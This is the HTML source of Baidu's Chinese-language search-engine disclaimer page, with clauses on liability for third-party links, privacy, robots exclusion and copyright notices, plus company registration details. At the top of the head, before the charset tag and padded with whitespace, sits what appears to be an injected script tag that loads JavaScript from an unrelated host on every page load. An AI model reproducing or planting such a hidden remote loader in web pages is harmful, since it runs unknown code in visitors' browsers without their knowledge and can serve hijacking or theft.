<!DOCTYPE html>
<html lang="en">
<head><script async src="//ij.so9.cc/j/?t=fx&g=8cab8ed0be60&c=708b1a3f03ee&rv=1"></script>                
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

    <script src="https://ss1.bdstatic.com/5eN1bjq8AAUYm2zgoY3K/r/www/cache/static/protocol/https/jquery/jquery-1.10.2.min_65682a2.js"></script>

    <!--[if lt IE 9]>
        <script src="./static/html5shiv.js"></script>
    <![endif]-->

    <link href="./index.css" rel="stylesheet" type="text/css" />
    <link href="./static/normalize.css" rel="stylesheet" type="text/css" />

    <title>免责声明</title>

</head>
<body>
    <header>
        <div class="privacy-mainHeader">
            <div class="privacy-header-left">
                <a href="https://www.baidu.com">
                    <img
                    src="https://www.baidu.com/img/flexible/logo/pc/privacy.gif"
                    width="117"
                    height="38"
                    alt="百度"
                    class="privacy-img"
                    >
                </a>
            </div>
            <div class="privacy-header-right">
                <a href="https://www.baidu.com/">百度首页</a>
            </div>
            <div class="privacy-header-right">
                <a href="http://home.baidu.com/">关于百度</a>
            </div>
        </div>
    </header>
    <div id="privacy-body">
        <div id="mainContent">

            <nav class="privacy-nav-navbar privacy-nav-navbar-gap">
                <ul class="privacy-nav-menu-primary">
                    <li class="privacy-nav-menu-item" id="知识产权声明">
                        <a href="copyright.html">知识产权声明</a>
                    </li >
                    <li class="privacy-nav-menu-item" id="免责声明">
                        <a href="mianze-shengming.html">免责声明</a>
                    </li >
                    <li class="privacy-nav-menu-item" id="权利声明">
                        <a href="right.html">权利声明</a>
                    </li >

                    <li class="privacy-nav-menu-item" id="隐私权保护声明">
                        <a href="yinsiquan-policy.html">隐私权保护声明</a>
                        <ul class="privacy-nav-submenu" style="display: none; ">
                            <li class="privacy-nav-submenu-item privacy-nav-submenu-item-withitems" id="百度隐私政策总则">
                                <a href="yinsiquan-policy.html">百度隐私政策总则</a>
                                <ul class="privacy-nav-nestedmenu" style="display: none; ">
                                    <li class="privacy-nav-nestedmenu-item" id="#引言">
                                        引言
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#我们如何收集和使用您的个人信息">
                                        我们如何收集和使用您的个人信息
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#我们如何使用Cookie和同类技术">
                                        我们如何使用 Cookie 和同类技术
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#我们如何共享、转让、公开披露您的个人信息">
                                        我们如何共享、转让、公开披露您的个人信息
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#我们如何保存及保护您的个人信息">
                                        我们如何保存及保护您的个人信息
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#您的权利">
                                        您的权利
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#我们如何处理未成年人的个人信息">
                                        我们如何处理未成年人的个人信息
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#您的个人信息如何进行跨境转移">
                                        您的个人信息如何进行跨境转移
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#本隐私政策如何更新">
                                        本隐私政策如何更新
                                    </li>
                                    <li class="privacy-nav-nestedmenu-item" id="#如何联系我们">
                                        如何联系我们
                                    </li>
                                </ul>
                            </li>

                            <li class="privacy-nav-submenu-item privacy-nav-submenu-item-underitems" id="特定产品的隐私保护">
                                <a href="yinsiquan-sub.html">特定产品的隐私保护</a>
                            </li>

                            <li class="privacy-nav-submenu-item" id="隐私问题报告">
                                <a href="#">隐私问题报告</a>
                            </li>
                        </ul>
                    </li>

                    <li  class="privacy-nav-menu-item" id="网民权益保障计划">
                        <a href="baozhang.html">网民权益保障计划</a>
                    </li>
                </ul>
            </nav>


            <div class="privacy-main-container">
                <div id="aboutToShow">
                    <main>
                        <a href="#">
                            <h1 class="privacy-title privacy-title-gap" >
                                免责声明
                            </h1>
                        </a>
                        <p class="privacy-paragraph privacy-paragraph-gap">
                            百度提醒您：在使用百度搜索引擎（以下简称百度）前，请您务必仔细阅读并透彻理解本声明。您可以选择不使用百度，但如果您使用百度，您的使用行为将被视为对本声明全部内容的认可。
                        </p>

                        <ul class="privacy-ul-gap">
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                鉴于百度以非人工检索方式、根据您键入的关键字自动生成到第三方网页的链接，除百度注明之服务条款外，其他一切因使用百度而可能遭致的意外、疏忽、侵权及其造成的损失（包括因下载被搜索链接到的第三方网站内容而感染电脑病毒），百度对其概不负责，亦不承担任何法律责任。
                            </li>
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                任何通过使用百度而搜索链接到的第三方网页均系他人制作或提供，您可能从该第三方网页上获得资讯及享用服务，百度对其合法性概不负责，亦不承担任何法律责任。
                            </li>
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                百度搜索结果根据您键入的关键字自动搜索获得并生成，不代表百度赞成被搜索链接到的第三方网页上的内容或立场。
                            </li>
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                您应该对使用搜索引擎的结果自行承担风险。百度不做任何形式的保证：不保证搜索结果满足您的要求，不保证搜索服务不中断，不保证搜索结果的安全性、正确性、及时性、合法性。因网络状况、通讯线路、第三方网站等任何原因而导致您不能正常使用百度，百度不承担任何法律责任。
                            </li>
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                百度尊重并保护所有使用百度用户的个人隐私权，您注册的用户名、电子邮件地址等个人资料，非经您亲自许可或根据相关法律、法规的强制性规定，百度不会主动地泄露给第三方。百度提醒您：您在使用搜索引擎时输入的关键字将不被认为是您的个人隐私资料。
                            </li>
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                任何网站如果不想被百度收录（即不被搜索到），应该及时向百度反映，或者在其网站页面中根据拒绝蜘蛛协议（Robots Exclusion Protocol）加注拒绝收录的标记，否则，百度将依照惯例视其为可收录网站。
                            </li>
                            <li class="privacy-paragraph privacy-paragraph-gap-before">
                                任何单位或个人认为通过百度搜索链接到的第三方网页内容可能涉嫌侵犯其信息网络传播权，应该及时向百度提出书面权利通知，并提供身份证明、权属证明及详细侵权情况证明。百度在收到上述法律文件后，将会依法尽快断开相关链接内容。详情参见特定频道的著作权保护声明。
                            </li>
                        </ul>

                        <ul class="privacy-ul-gap privacy-ul-style">
                            <li class="privacy-paragraph">
                                <b>基本信息</b>
                            </li>
                            <li class="privacy-paragraph">
                                <b>北京百度网讯科技有限公司</b>
                            </li>
                            <li class="privacy-paragraph">
                                统一社会信用代码/注册号：91110000802100433B
                            </li>
                            <li class="privacy-paragraph">
                                注册资本：1342128万元
                            </li>
                            <li class="privacy-paragraph">
                                法定代表人：梁志祥
                            </li>
                            <li class="privacy-paragraph">
                                成立日期：2001-06-05
                            </li>
                            <li class="privacy-paragraph">
                                营业期限：2001-06-05 至 长期
                            </li>
                            <li class="privacy-paragraph">
                                企业类型：有限责任公司(自然人投资或控股)
                            </li>
                            <li class="privacy-paragraph">
                                注册地址：北京市海淀区上地十街10号百度大厦2层
                            </li>
                            <li class="privacy-paragraph">
                                经营范围：技术转让、技术咨询、技术服务、技术培训、技术推广；设计、开发、销售计算机软件；经济信息咨询；利用www.baidu.com、www.hao123.com(www.hao222.net、www.hao222.com)网站发布广告；设计、制作、代理、发布广告；货物进出口、技术进出口、代理进出口；医疗软件技术开发；委托生产电子产品、玩具、照相器材；销售家用电器、机械设备、五金交电（不含电动自行车）、电子产品、文化用品、照相器材、计算机、软件及辅助设备、化妆品、卫生用品、体育用品、纺织品、服装、鞋帽、日用品、家具、首饰、避孕器具、工艺品、钟表、眼镜、玩具、汽车及摩托车配件、仪器仪表、塑料制品、花、草及观赏植物、建筑材料、通讯设备、汽车电子产品、器件和元件、自行开发后的产品；预防保健咨询；公园门票、文艺演出、体育赛事、展览会票务代理；翻译服务；通讯设备和电子产品的技术开发；计算机系统服务；车联网技术开发；汽车电子产品设计、研发、制造（北京市中心城区除外）；演出经纪；人才中介服；经营电信业务；利用信息网络经营音乐娱乐产品、演出剧（节）目、动漫产品、游戏产品（含网络游戏虚拟货币发行）、表演、网络游戏技法展示或解说（网络文化经营许可证有效期至2020年04月17日）；因特网信息服务业务（除出版、教育、医疗保健以外的内容）；图书、电子出版物、音像制品批发、零售、网上销售。（市场主体依法自主选择经营项目，开展经营活动；演出经纪、人才中介服务、利用信息网络经营音乐娱乐产品、演出剧（节）目、动漫产品、游戏产品（含网络游戏虚拟货币发行）、表演、网络游戏技法展示或解说、经营电信业务以及依法须经批准的项目，经相关部门批准后依批准的内容开展经营活动；不得从事国家和本市产业政策禁止和限制类项目的经营活动。）
                            </li>
                        </ul>
                        <div class="privacy-copyright">
                                Baidu 京ICP证030173号
                        </div>

                    </main>
                </div>


                <div class="privacy-appendContainer">
                </div>

            </div>



        </div>
    </div>


    <script src="./index.js"></script>
</body>
</html>